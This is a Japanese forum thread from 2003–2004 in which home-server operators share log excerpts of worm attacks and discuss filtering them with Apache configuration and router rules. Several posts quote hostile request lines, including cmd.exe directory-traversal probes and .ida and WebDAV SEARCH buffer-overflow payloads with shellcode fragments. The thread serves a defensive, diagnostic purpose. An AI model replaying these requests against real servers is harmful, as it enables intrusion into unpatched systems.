209:DNS未登録さん
03/08/05 11:16 .net
>>208
なんか穴があるんだろうね
いい機会だから徹底的にしらべましょう
210:DNS未登録さん
03/08/05 11:20 .net
この会社に恨みがある奴がやりまくったのかな
211:205
03/08/05 11:21 .net
SSLとBINDがあやしいっすね。
最近会社忙しく自宅鯖放置気味だったからバチが当たったなー…
なんていうか、自宅に帰る7時半まで手を出せないのがもどかしい…
212:DNS未登録さん
03/08/05 12:56 .net
atfr064007013.do.ppp.infoweb.ne.jp - - [04/Aug/2003:01:02:25 +0900] "GET /defaul
t.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u68
58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190
%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 332 "-" "-"
yahoobb219214144203.bbtec.net - - [04/Aug/2003:12:12:29 +0900] "GET /default.ida
?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c
3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 332 "-" "-"
この2ホスト、ここ1ヶ月ほど止まらない。
毎日回線を切ってるのか、IPアドレスは毎回変わるんだが・・・
そろそろISPのabuseにでも連絡すっかな。
213:DNS未登録さん
03/08/05 15:36 .net
>>212
> 毎日回線を切ってるのか、IPアドレスは毎回変わるんだが・・・
・・・。
214:DNS未登録さん
03/08/05 20:59 qWW0gjj4.net
ウィルス、ワーム対策としてモデムとサーバの間にルータを噛ませてさらにサーバ、
クライアントにはウィルス対策ソフトをインストールする程度ではまだ足りないでしょうか?
もちろんウィンドウのアップデート、パッチは最新のものをなるべく早く当てるようにします。
215:DNS未登録さん
03/08/05 21:16 .net
>>214
根本的にだめ。
ウイルス、ワーム、セキュリティについてのポリシーを
自分で確立すべし
216:DNS未登録さん
03/08/06 19:31 .net
俺の自宅サーバーにおけるセキュリティについての考え方のひとつに
「稼動時間を減らす」てのあるけど誰も賛同してくれん。
「馬鹿じゃねぇ?」「使えねぇ!」の連呼
うるせー馬鹿!
217:DNS未登録さん
03/08/06 20:44 .net
>>216
いや、科学技術庁も導入したぐらいだし(藁
218:DNS未登録さん
03/08/06 21:29 .net
稼働時間を減らしたところで、穴をあけっぱなしにしていれば頻繁にやってくるワームにやられるので
結局常時稼働とさほど変わらないんでないの?
セキュリティで最も重要なのは、穴をあけない、見つかったらすぐにふさぐという基本的な事項をしっかり行うこと。
219:DNS未登録さん
03/08/09 14:49 .net
うちは、CodeRedが30~40件/日、ほとんどが韓国と中国
それから、Nimdaも30~40連続アタック
[error][client 61.213.32.47] 千葉のCATV局だ。もー頼むよ・・・。
220:DNS未登録さん
03/08/09 15:00 .net
うちも先月までは>>219とほぼ同量のアタックがあったんだが、
1週間程度、接続元IPが韓国・中国・台湾のパケットを総蹴りにしたら
解除した後もなぜかアタックが以前より減少してる
221:DNS未登録さん
03/08/09 20:59 .net
どれくらい来てるのかな?とオモテ2002年10月以降のログを一括検索したら4609件出てきた。
ヽ(`Д´)ノウワァァァン
222:DNS未登録さん
03/08/11 04:02 .net
Nimdaの時に比べたらかなり平和だよな。
あのときはピーク時で1分間に2~3回アクセスが続いたし。
帰省中だったので放置しているうちにログが肥大化して帰ってきたらfile system fullでかなり焦った。
223:山崎 渉
03/08/15 22:39 .net
(⌒V⌒)
│ ^ ^ │<これからも僕を応援して下さいね(^^)。
⊂| |つ
(_)(_) 山崎パン
224:DNS未登録さん
03/08/16 09:01 .net
今度は135の悪夢
225:DNS未登録さん
03/09/04 02:11 LR09Pn2s.net
保守age
226:DNS未登録さん
03/09/05 21:06 .net
パケット通信危うし・・・
納入先監視装置、今月は1万円を越えました×n台
この先どうなることやら・・・
227:DNS未登録さん
03/09/10 01:25 .net
yahoobb219178230052.bbtec.net [10/Sep/2003:00:47:47 +0900] "GET / HTTP/1.1" "-"
デザインが変...
228:DNS未登録さん
03/09/21 00:51 WMVqyFB1.net
もう ahooBB 大迷惑。パッチ宛ててるのかどうか知らんけど。
当ててたとしたら、肝心の駆除してねぇヤツ多すぎ。
全部 bbtec.net 遮断に決定。俺は困らねぇし。
229:DNS未登録さん
03/09/21 01:06 yExHdUrY.net
UDP LOOPアタックくらいまくりなんですがどうしたらいいですか?
特定の相手難ですが。
230:DNS未登録さん
03/09/21 23:20 hhJEgwIw.net
2003/09/21(23:14:55) W-SV 218.188.110.35 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/09/21(23:15:01) W-SV 218.188.110.35 [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0"
2003/09/21(23:15:06) W-SV 218.188.110.35 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/09/21(23:15:12) W-SV 218.188.110.35 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
パッチ当ててない鯖って周りにも迷惑かけて最悪だな
231:DNS未登録さん
03/09/22 00:48 zRSNpj4D.net
ahooBBキター
2003/09/22(00:25:32) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0"
2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
232:困ってるよん
03/09/22 22:08 16HVoww6.net
IPアドレスを変えてSEARCHをかけて来てます、どうしたらいいでしょうか?
これずっとやられて、アクセス数がどんどん増えて行ってしまいます。
同時接続数が限られる環境でこの攻撃は痛いです。
だれか辞めさせる手段をご教授お願いします。
2003-09-22 11:56:38 140.112.88.18 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 11:58:03 67.128.66.123 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 11:58:04 67.128.66.123 - "" SEARCH / - 411 -
2003-09-22 12:07:06 12.168.146.99 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:07:06 12.168.146.99 - "" SEARCH / - 411 -
2003-09-22 12:10:31 62.254.0.18 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:10:31 62.254.0.18 - "" SEARCH / - 411 -
2003-09-22 12:12:38 202.64.33.192 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:12:38 202.64.27.183 - "" SEARCH / - 411 -
2003-09-22 12:13:48 81.152.119.97 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:13:48 81.152.119.97 - "" SEARCH / - 411 -
2003-09-22 12:18:41 80.222.212.13 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:18:42 80.222.212.13 - "" SEARCH / - 411 -
2003-09-22 12:19:39 194.100.73.249 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:19:39 194.100.73.249 - "" SEARCH / - 411 -
2003-09-22 12:22:34 219.0.96.166 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:22:34 219.0.96.166 - "" SEARCH / - 411 -
2003-09-22 12:31:35 81.106.226.196 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:31:36 81.106.226.196 - "" SEARCH / - 411 -
2003-09-22 12:33:22 220.36.28.75 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:33:22 220.36.28.75 - "" SEARCH / - 411 -
2003-09-22 12:39:38 68.75.21.33 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:39:38 68.75.21.33 - "" SEARCH / - 411 -
2003-09-22 12:49:59 4.65.242.242 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:49:59 4.65.242.242 - "" SEARCH / - 411 -
2003-09-22 12:50:56 61.242.82.156 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:50:56 61.242.82.156 - "" SEARCH / - 411 -
2003-09-22 12:52:25 68.122.155.202 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:52:25 68.122.155.202 - "" SEARCH / - 411 -
2003-09-22 12:52:55 63.196.240.140 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:52:57 63.196.240.140 - "" SEARCH / - 411 -
2003-09-22 12:57:34 67.115.71.91 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:57:34 67.115.71.91 - "" SEARCH / - 411 -
2003-09-22 12:58:18 217.32.133.75 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:58:21 217.32.133.75 - "" SEARCH / - 411 -
2003-09-22 13:01:16 138.23.162.248 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 13:01:16 138.23.162.248 - "" SEARCH / - 411 -
233:DNS未登録さん
03/09/22 22:16 9mxWCQXY.net
ホウムペイジ作り中だよっ
URLリンク(azarashi.ddo.jp)
234:sage
03/09/23 01:18 AzHK5NDc.net
うちのSnortSnarfの警告ページね。
2つの異なるイグネチャーが219.96.206.60として存在しています。発信源
・65個の事例はWEB-IIS ISAPI .ida attempt
・65個の事例はWEB-IIS cmd.exe access
ここ学校なんだよね~
あまりにウザイからwhoisでわざわざ調べて
メールで教えてあげようと思ったら。
failure noticeときたもんだ!
管理ちゃんとしようよー
235:DNS未登録さん
03/09/23 12:08 .net
>>234
219.96.206.60 = haruna.kibou.ed.jp
適当にpostmaster@とかwebmaster@に送ってみたらどうよ
236:DNS未登録さん
03/09/25 17:34 .net
いまだにcoderedとかに感染している奴氏んでしまえばいいのに
237:DNS未登録さん
03/09/25 17:59 .net
codegreenを(ry
238:DNS未登録さん
03/11/02 17:33 q0bLnL52.net
WINNTAutoAttackっていうんですかこれ?
221.194.178.13 - - [02/Nov/2003:14:52:31 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%u898b%u77e8%
u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
(以下略)
中国人かな?
239:DNS未登録さん
03/11/20 11:11 Ie2pkvRt.net
taro.eco.saitama-u.ac.jp - - [20/Nov/2003:10:48:04 +0900] "GET /scripts/nsiislog.dll HTTP/" 404
240:Hacktool.WKRShell
03/11/21 00:09 .net
URLリンク(www.symantec.com)
Hacktool.WKRShell
セキュリティホール memo
URLリンク(www.st.ryukoku.ac.jp)
Workstation サービスのバッファオーバーランにより、コードが実行される (828749) (MS03-049)
URLリンク(www.st.ryukoku.ac.jp)
EEYE: Windows Workstation Service Remote Buffer Overflow (eEye、2003.11.12)
URLリンク(www.st.ryukoku.ac.jp)
MS03-049が危険な理由 (ZDNet)
URLリンク(www.zdnet.co.jp)
241:DNS未登録さん
03/11/30 02:44 fHEXUDOq.net
445 のアタックすさまじすぎ
242:DNS未登録さん
03/11/30 13:08 Wqab79f6.net
最近こんなのばっか
213.242.186.162 - - [30/Nov/2003:12:24:12 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
adsl-68-90-244-157.dsl.hstntx.swbell.net - - [30/Nov/2003:12:24:18 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
dyn-greek-180-227.dyn.columbia.edu - - [30/Nov/2003:12:25:06 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
63.172.94.170 - - [30/Nov/2003:12:27:53 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
adsl-63-202-55-65.dsl.frsn01.pacbell.net - - [30/Nov/2003:12:28:01 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
cache-2.sfrn.ca.webcache.rcn.net - - [30/Nov/2003:12:28:24 +0900] "GET / HTTP/1.0" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
061092205038.ctinets.com - - [30/Nov/2003:12:30:20 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
alb-24-194-36-62.nycap.rr.com - - [30/Nov/2003:12:32:56 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
adsl-66-143-248-208.dsl.snantx.swbell.net - - [30/Nov/2003:12:35:24 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
h-68-165-88-115.nycmny83.covad.net - - [30/Nov/2003:12:35:44 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
誰か対処法教えて…ログがわけわかんなくなる
243:DNS未登録さん
03/11/30 13:47 .net
ウチは、ルータで Directed Broadcast 破棄しといた
244:DNS未登録さん
03/12/01 00:13 .net
65-86-200-30.client.dsl.net - - [30/Nov/2003:20:32:26 +0900] "GET /scripts/nsiislog.dll" 404 315 -%
アメリカより。
245:DNS未登録さん
03/12/02 14:27 .net
>>242
ping に反応しなきゃ送ってこない
246:DNS未登録さん
03/12/03 18:21 zykLI/Va.net
>>245
うちのルータもpingを排除したら迷惑な香具師も少なくなりますた
247:DNS未登録さん
03/12/03 23:16 .net
一日1500くらいアタックがくるよ。
一分に一回程度。
やんなっちゃう。
真っ当なアクセスなら1500って夢のような数字だけどさ
ルータ新しいのにかえようかなあ
pingを排除できるルータがあるんならかえたい。
けど、金ない。
よわったのお
248:DNS未登録さん
03/12/11 16:10 .net
>>247
iptables -A INPUT -p icmp -i ppp+ -j DROP
スレ違いレス
249:DNS未登録さん
04/01/21 04:09 .net
なんかこのスレ見て自分の鯖が心配になってきた。
確認する方法と防ぐ方法きぼんぬ。
250:DNS未登録さん
04/01/24 05:10 .net
OSがWindowsならWindowsUpだて汁!
他のOSはシラネ
251:DNS未登録さん
04/01/27 02:10 .net
>>249
linuxとかにしる
252:DNS未登録さん
04/01/27 19:07 .net
>>249
鯖の電源切れば心配しなくてもよくなるYO
253:DNS未登録さん
04/01/28 16:31 E31XDYJQ.net
良スレage
254:DNS未登録さん
04/02/05 00:53 .net
同じIPから毎日のように来るので
調べてみたらどうやらクライアント機らしい。
同じ時間帯に集中するのは、その時間帯に電源入れてるから。
updateやウイルスチェックぐらいしろと…
255:DNS未登録さん
04/02/05 01:15 .net
巛彡彡ミミミミミ彡彡
巛巛巛巛巛巛巛彡彡
r、r.r 、|::::: |
r |_,|_,|_,||:::::: ⌒ ⌒|
|_,|_,|_,|/⌒ -="- (-="
|_,|_,|_人そ(^i '"" ) ・ ・)""ヽ
| ) ヽノ |. ┃`ー-ニ-イ`┃ そうでっか、そうでっか、なるほどね
| `".`´ ノ ┃ ⌒ ┃|
人 入_ノ´ ┃ ┃ノ\
/ \_/\\ ┗━┛/ \\
/ \ ト ──イ/ ヽヽ
/ ` ─┬─ イ i i
/ | Y | |
/ | ヽ__|_|
巛彡彡ミミミミミ彡彡
巛巛巛巛巛巛巛彡彡
r、r.r 、|::::: |
r |_,|_,|_,||:::::: /' '\ |
|_,|_,|_,|/⌒ (・ ) (・ )|
|_,|_,|_人そ(^i ⌒ ) ・・)'⌒ヽ
| ) ヽノ |. ┏━━┓|
| `".`´ ノ ┃ ノ ̄i ┃|
人 入_ノ´ ┃ヽニニノ┃ノ\ ・・・・で?seireiやnekoninがサービス悪いとでもいいたいの?
/ \_/\\ ┗━┛/|\\
/ \ ト ──イ/ ヽヽ
/ ` ─┬─ イ i i
/ | Y |
256:DNS未登録さん
04/02/10 05:16 .net
>>247
1500アタック/日?普通だよ、普通。
>>249
FW・フィルタ付きのルータを導入し、SYSLOGを見れ。
257:DNS未登録さん
04/02/11 11:45 .net
最近、時々来る "GET /sumthin"が不気味だな。
200.119.14.xxx - - [11/Feb/2004:00:28:41 +0900] "GET /sumthin HTTP/1.0" 404 3720 "-" "-"
258:DNS未登録さん
04/02/11 22:12 .net
>>257
それはサムスンの綴りを間違えたのです。
ってのは冗談で、
ググるとすこしはわかるかもしれませんよ。
259:DNS未登録さん
04/02/12 17:00 .net
ワームじゃないんだけど
韓国からのアクセスが多い、
ログにIPは違うけどIE 5.5 Windows98がずらっと並んでるんだよね
鯖立てたばかりでHPも工事中でTOPページだけ、アクセスなんて殆ど無いのに、
一時間に3回ぐらいの割合で入ってる
毎回違う串さして同一人物がやってるんだろうか…
他にログが無くてこればっかり並んでるから激しく怖い
260:DNS未登録さん
04/02/14 20:26 .net
Windows98のIE5.5を詐称するならワーム
たしかWelchiaとかいう
261:DNS未登録さん
04/03/12 15:12 .net
218.108.238.159 - - [08/Mar/2004:19:26:05 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.79.212.100 - - [08/Mar/2004:20:58:49 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.13.247.16 - - [09/Mar/2004:12:23:38 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.84.159.6 - - [09/Mar/2004:12:53:39 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.0.209.6 - - [09/Mar/2004:15:06:01 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.13.49.63 - - [09/Mar/2004:15:51:22 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.23.96.176 - - [09/Mar/2004:16:07:40 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.94.194.252 - - [09/Mar/2004:22:55:53 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.29.237.46 - - [09/Mar/2004:23:47:40 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.235.111.183 - - [10/Mar/2004:08:45:59 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.46.6.210 - - [10/Mar/2004:09:27:14 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.51.241.47 - - [10/Mar/2004:10:11:14 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.178.173.142 - - [10/Mar/2004:15:35:39 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.210.180.3 - - [10/Mar/2004:18:02:40 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.92.10.199 - - [10/Mar/2004:18:59:06 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.232.181.151 - - [10/Mar/2004:21:36:15 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
61.92.205.94 - - [11/Mar/2004:03:39:46 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
218.61.20.56 - - [12/Mar/2004:01:41:09 +0900] "SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90" 414 271 "-" "-"
262:DNS未登録さん
04/03/12 16:35 .net
219.133.182.176 - - [10/Mar/2004:13:48:10 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-"
219.145.4.26 - - [10/Mar/2004:20:28:03 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-"
219.133.125.221 - - [11/Mar/2004:00:34:39 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-"
263:DNS未登録さん
04/03/13 03:37 .net
FTPでいろんなアカウントとパスを組み合わせてくるやつが居るけど、
あれは単に割れ鯖をさがしてるクローラー?
264:DNS未登録さん
04/03/22 21:24 .net
usen-221x114x94x213.ap-us01.usen.ad.jp - - [22/Mar/2004:16:29:42 +0900] "SEARCH
/\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x0
2\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x0
2\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1(ry
('-`).。oO(鬱陶しいことこの上ないのだが
265:DNS未登録さん
04/03/31 12:01 .net
220.145.233.60 - - [31/Mar/2004:10:29:15 +0900] "SEARCH /\x90\x02\ (ry
大量にキテル…しかも1リクエストに32Kbyteもある…
鯖ではないだろうけど、ウイルス対策くらいしっかりしてほしいなぁ
266:DNS未登録さん
04/04/01 02:36 .net
ログを切り分けたいのですが上手くいかね。
SetEnvIf Request_URI "^/\\x90\\x02" worm nolog
SetEnvIf Request_URI "^/\x90\x02" worm nolog
アドバイスよろ。
267:DNS未登録さん
04/04/01 04:08 .net
>>266
スレリンク(unix板:812-814番)
情報が分散するのは良くないよな
268:DNS未登録さん
04/04/02 02:51 .net
>>267
ありがと,そっちのスレはチェックしてませんでした。
SetEnvIf じゃ分けれませんか(´・ω・`)ショボーン
269:267
04/04/02 04:18 .net
>>268
なんとな~くだけど、vhost使って分けられそうな気がしない?
大抵のウィルスはhostを名乗らないので、別けられそうな気がする
とか思いつつ、俺は放置してるわけだが
270:267
04/04/02 05:36 .net
いい機会なんで試してみたが、分離は可能でした
結果だけ報告
271:DNS未登録さん
04/04/02 19:16 .net
>>266
パイプ経由のロギングを利用するのはどうよ?
CustomLog "|/root/sh/logfilter >> /var/log/httpd/access_log" combined env=!nolog
とでもして、/root/sh/logfilterスクリプト内で"SEARCH /\x90\x02\…"は弾くようにするとか。
272:DNS未登録さん
04/04/02 21:53 .net
267のリンク先の814だが。
Mac 板の UNIX スレだか鯖スレだかにも書いたような気がするが、
<VirtualHost> で分離するのは当然有効。
ワーム以外にも踏台探しのアフォによるアクセスも隔離できることが多いのでオススメ。
あるいは、「異常なログを隔離する」ではなく、
CustomLog /dev/null common
CustomLog /path/to/access_log combined env=REMOTE_ADDR
のように、環境変数が正常にセットされているもののみ隔離するという方法でも
できそうだが、これはうまくいくかどうかは試していない。
273:DNS未登録さん
04/04/03 03:17 .net
>>272
<VirtualHost>でhost名を知らないアクセス=ワームを分離する方法ですが、
これだとローカルからのIP直打ちアクセスも分離されてしまうんじゃないでしょうか。
わざわざ串を刺すのはちょっと…。
274:267
04/04/03 04:13 .net
>>273
うちのルータ(というより*BSD箱だけど)はグローバルIPでアクセスしても応答してくれるから問題は無いし
hosts に書くかDNS鯖に細工をすれば対処できませんか?
それに自分のアクセスがログに記録されないぐらいならデバック時以外は被害は少ないと思われ
275:DNS未登録さん
04/04/03 11:38 .net
272だが。
IP 直打ちでも Host: にその IP アドレスが入るので、
プライベートアドレスを ServerAlias に指定すればよし。
NameVirtualHost *
<VirtualHost *>
ServerName dummy.host
CustomLog [隔離ログ]
...
</VirtualHost>
<VirtualHost *>
ServerName xxx.yyy.zzz
ServerAlias localhost 127.0.0.1 192.168.0.1 ...
CustomLog [ほんとのログ]
...
</VirtualHost>
このように設定すれば、Host: がないか、あってもグローバルの IP アドレスの場合は
dummy.host の設定が使われる。
276:273
04/04/03 15:51 .net
>>274-275
大変参考になりました。
で、>>261他のログを分離できたとはいえ、そのままではログファイルを圧迫することに変わりないので
アクセスログの書式も
\"%r\" → \"%m %!414U %H\"
として、414(HTTP_REQUEST_URI_TOO_LARGE)のときはURLを記録しないように、
ついでにクソ長いクエリ送ってくるワーム用にクエリ文字列を記録しないよう変更しました。
277:DNS未登録さん
04/04/04 02:33 .net
どうしよう。ログにクソクエリの跡が
278:DNS未登録さん
04/04/05 22:05 .net
ワーム用の<VirtualHost>設定でDocumentRootを/dev/nullにしちゃうのはマズいでしょうか?
279:DNS未登録さん
04/04/06 10:08 .net
SEARCH /\x90\x02\xb1(中略)\x90\x90\x90\x90 で来るヤツって
www のホスト名で来てませんか?
280:DNS未登録さん
04/04/06 10:14 .net
>>278
/dev/zeroにしてください
281:278
04/04/06 14:51 .net
>>276
レスありがとうございます。あれから調べてみたところ、どうやら/dev/nullや/dev/zeroといった
特殊デバイスはApacheではアクセスできないようになっているみたいですね。
実験的にDocumentRootに設定してみましたが、エラーログには
[Tue Apr 6 12:34:56 2004] [error] [client xxx.xxx.xxx.xxx] object is not a file, directory or symlink: /dev/zero
と、/var/hogeのように存在しないディレクトリを設定した時と同じエラーが記録されていました。
まあワームにわざわざディレクトリを用意するのも馬鹿らしいので、/dev/zero指定にしようと思います。
282:DNS未登録さん
04/04/06 15:13 .net
いや、/dev/zeroはネタだろ…。
283:DNS未登録さん
04/04/06 15:26 .net
/dev/shm
284:DNS未登録さん
04/04/14 13:37 .net
保守
285:sage
04/04/21 15:04 2waT5kFU.net
誘導されてきました.
SEARCHとかのワーム攻撃を避けるために,
NGSecureWeb for Linux
URLリンク(canon-sol.jp)
とか
SRP(Secure Reverse Proxy)
URLリンク(www.gomibako.com)
とか使ってる人います?役に立ちますかね?
286:DNS未登録さん
04/04/21 16:44 .net
>>285
個人で鯖立ててる分には>>260以降の対策で十分なので要らないな。
まあわざわざ製品を使おうと考えてるところを見ると、業務用なんだろうけど。
287:DNS未登録さん
04/04/21 16:53 .net
>>286
ここは自宅鯖板
で、名前にsageを入れる意味は何なんだろう
288:DNS未登録さん
04/04/30 21:40 .net
自宅で鯖っつか社長の趣味で意味無く鯖立てたとか
最近のウィルスによるアクセスはその人達が原因かな
289:DNS未登録さん
04/05/04 23:15 .net
最近、ワーム多すぎ。ログがこればっかり。
290:DNS未登録さん
04/05/04 23:26 .net
ど、どれだ??(汗
291:DNS未登録さん
04/05/05 13:54 .net
ログなんか見てネーヨ
292:DNS未登録さん
04/05/05 14:01 .net
URLリンク(www.microsoft.com)
Sasser ワームについてのお知らせ
休み明けに注意
293:DNS未登録さん
04/05/09 05:51 .net
WOLでスタンバイにしているが、すぐに起動してしまうのは、ワームのせいなのかよ・・・。
294:DNS未登録さん
04/06/19 01:01 Jqdp5jls.net
緊急浮上
295:DNS未登録さん
04/06/20 01:36 .net
●.....●..●..●...●●..●●...●●..●●●....●●●●..●●.....●●●..●..●
無料のウイルス対策ソフトなどのセキュリティソフト一覧
URLリンク(www.geocities.co.jp)
●.●.●.●..●...●●.●..●●.●●......●..●●...●●...●●●.....●.●...●
296:DNS未登録さん
04/06/21 23:58 .net
感染しているPCを持っているユーザーに通知してあげたい
HPがあってメルアド書いててくれたら一番、楽なんだけどね
Windowsのメッセージサービスだっけ? あれって日本語も通るんだっけ?
気づいてくれないかなぁ・・・
